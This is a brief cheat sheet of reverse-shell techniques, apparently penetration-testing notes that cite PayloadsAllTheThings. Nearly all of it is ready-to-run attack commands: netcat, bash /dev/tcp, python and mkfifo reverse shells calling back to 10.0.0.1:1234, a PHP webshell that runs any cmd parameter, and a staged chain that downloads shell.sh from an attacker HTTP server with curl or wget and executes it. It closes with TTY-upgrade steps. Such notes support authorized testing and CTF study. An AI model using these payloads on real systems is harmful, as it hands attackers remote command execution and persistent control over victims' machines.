Skip to content

Reverse shell

  • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Well-known reverse shells

# Listener
nc -lnvp 1234

# netcat
nc -e /bin/bash 10.0.0.1 1234

# bash
bash -i >& /dev/tcp/10.0.0.1/1234 0>&1

# python
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

# netcat (openbsd)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

# php webshell
<?php echo "<pre>" . system($_REQUEST["cmd"]) . "</pre>"; ?>
$ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.0.0.1/1234 0>&1' > shell.sh
$ python3 -m http.server 8000

?cmd=curl+10.9.52.138:8000/shell.sh+-o+/tmp/shell.sh
or
?cmd=wget+10.9.52.138:8000/shell.sh+-O+/tmp/shell.sh

$ nc -lvnp 1234

?cmd=bash+/tmp/shell.sh

Interative shell (upgrade your shell)

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

CTRL+Z
stty raw -echo; fg
# Particularly useful with Windows shells (to use up/down arrows)
rlwrap nc -lvnp <port>
# On our computer
$ stty -a
speed 38400 baud; rows 17; columns 240; line = 0;
[...]

# On the reverse shell
stty rows 17
stty cols 240